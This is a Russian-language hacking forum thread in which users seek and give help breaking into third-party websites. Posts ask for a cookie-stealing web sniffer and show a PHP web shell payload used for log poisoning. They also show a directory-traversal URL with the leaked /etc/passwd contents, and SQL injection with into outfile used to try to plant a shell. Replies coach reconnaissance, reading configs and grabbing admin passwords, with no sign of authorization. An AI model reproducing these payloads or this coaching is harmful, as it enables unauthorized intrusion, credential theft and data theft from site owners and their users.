Подскажите пожалуйста Web сниффер для кражи куки. И ещё ,что нужно вставить вместо слова сниффер или можно оставить так?
Едва ли вообще все закрыто, если сайты не статичны. Загрузка хлама в админках, кеш и прочая фигня обычно доступны для записи. Ищите конфиги от баз и админок, попробуйте пройти через бд. Годный сниффер реализуется одним лишь веб-сервером. Никакой пхп тут не нужен. Для кук ничего больше не нужно, но, возможно, есть смысл посмотреть в сторону beef.
Нашел на сайте читалку файлов,нашел лог,пишу в лог <? phpinfo(); ?> , <?php system($_REQUEST['cmd']); ?> , и тд но не работает , в логах этот код выделяется красным ,и не хочет исполняться , что делать? есть на сайте файли phpinfo.php вот инфа от туда register_globals Off safe_mode Off magic_quotes_gpc Off
Если это читалка файлов, единственное её предназначение - показывать содержимое файла, не !подключать его содержимое! и не интерпретировать. Если есть возможность, прочитайте конфиг-файлы.
есть доступ во все папки home var usr etc и тому подобное а так же к логам читка конфигов нечего не дала без вариков залиться через логи?
без вариантов, но можно прочитать конфиги сайта, подключиться к БД, посмотреть пароль админа, залиться через сайт
Вспомнил, что у меня есть сайт, с подобной ситуацией, как выше. Тоже самое - не прокатывает интерпретация в логах, которые доступны. Стандартные логи не открываются, не хватает прав. Code: if($_REQUEST['imagepath']){ //Available file types $aMimeTypeList = array( 'image/jpeg', 'image/png', 'image/gif', ); if(substr($_REQUEST['imagepath'],0 ,6) == '/home/'){ if(file_exists($_REQUEST['imagepath'])){ /* DO NOT USE UNTIL GLOBAL DID ITS WORK :/ $oFileInfo = finfo_open(FILEINFO_MIME_TYPE); $sMimeType = finfo_file($oFileInfo, $_REQUEST['imagepath']); if(in_array($sMimeType, $aMimeTypeList)) { echo file_get_contents($_REQUEST['imagepath']); } else echo "Unsupported file type: ".$sMimeType; */ ///24 строка echo file_get_contents($_REQUEST['imagepath']); } Это код файла через который читаю файлы, стоит директория /home, не знаю ограничение это или что, но обходиться таким макаром /home/../var/. Читать дает все что в хоум, и частично из системных папок. Но /proc/pid/fd/fid как и сами логи не дает открыть, Permission denied on line 24. Пути до них нашел вслепую. 24 строку пометил в коде. По поводу бд - есть очень много бд и все данные к ним, но базы я так понял, лежат в подсетях и подключение только из локалки и некоторых адресов(?). Есть список доступных ip для подключения к одной из баз, но может быть не для всех есть вайт лист. Если есть возможность подключиться из вне и как это можно реализовать, буду благодарен за помощь. И вообще буду благодарен, за любой совет по теме. Спасибо.
Взлом - это в первую очередь изначально сбор информации о цели. Ты либо ее не собрал либо не показал нам: порты, субдомены, скан директорий, какая CMS, информация о домене, хостере, пробив мыл с сайта, проверка диапазона сети, чек найденных паролей на других сервисах etc.
Прошу помощи, нашёл на сайте это: http://site.com/file.php?filename=../../../../../../../../../../etc/passwd Выводит содержимое: Code: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin webuser:x:497:495::/home/webuser:/sbin/nologin user123:x:500:500::/data/www:/sbin/nologin administrator:x:501:501::/home/administrator:/bin/bash по сути я весь исходный код сайта прочитал, нашёл данные от БД, но удаленно подключится не получилось. Подскажите что можно ещё сделать? нужно получить доступ к БД.
sav77,в случае если это все-же LFI попробуй например: _ttp://forum.xakepinter.net/showthread.php?t=474
Сайт работает на MSSQL, но там указан ip к подключению этот 192.168.1.19, хз как подключится к нему... Там не LFI, а directory traversal я так понял.
Продолжение все той же прошлой истории. Когда я уже решил забить на взлом сайта (ну, точней как, полазить в БД я смог, что интересно было посмотрел, но вообще мне хотелось внедрить шелл), я решил пробить адрес сайта в гугле и обнаружил их тестовый сервер, который функционально работает точно так же, как и оригинал. Что приятно, на тестовом сервере БД работает под админской учетной записью. Права file_priv есть, файлы через load_file() читаются, а значит логично предположить, что в таких условиях и into outfile тоже должен быть активен. Тем не менее, писать файлы мне не удается, предположительно из-за того, что у mysql процесса нет прав на запись в тех директориях, куда я пробовал. Что самое удивительное, мне почему-то не удается записать файл даже через select 1 into outfile 'tmp.txt', т.е. в домашнюю директорию mysql, куда, по идее, mysql должен иметь права на запись. Так вот, как вообще находят директории для записи файлов? Банально логически или есть какой-то подход? И какие директории можно протестировать, чтобы понять наверняка, может ли msql вообще хоть куда-нибудь писать файлы или нет. Upd: попробовал писать хотя бы в /tmp но тоже не срабатывает, что совсем странно. Я теряюсь в догадках, в чем может быть дело, с учетом того, что это тестовый сервер и аккаунт к БД админский (т.е. логично предположить, что там не должно быть строгой защиты) - то ли я что-то делаю не то, либо на mysql процесс висит запрет на запись файлов, либо я даже не знаю что тут думать. При этом на тестовой сервере открыт порт mysql (хотя конечно же я не могу подключится без соответствующей записи в БД, которую наврядли можно добавить через select инъекцию) и несколько устаревший webmin 1.5.9 Upd2: вобщем, оказалось, что несмотря на сообщение об ошибке, файлы писались на тестовом сервере (заодно узнал, что на основном сервере у меня все же нет FILE прав), но доступа на запись в домашний каталог у меня нет (где и располагались файлы сайта), и LFI уязвимостей в имеющемся коде тоже нет. Так что без вариантов, разве что внезапно появится какой-нить подходящий эксплоит.
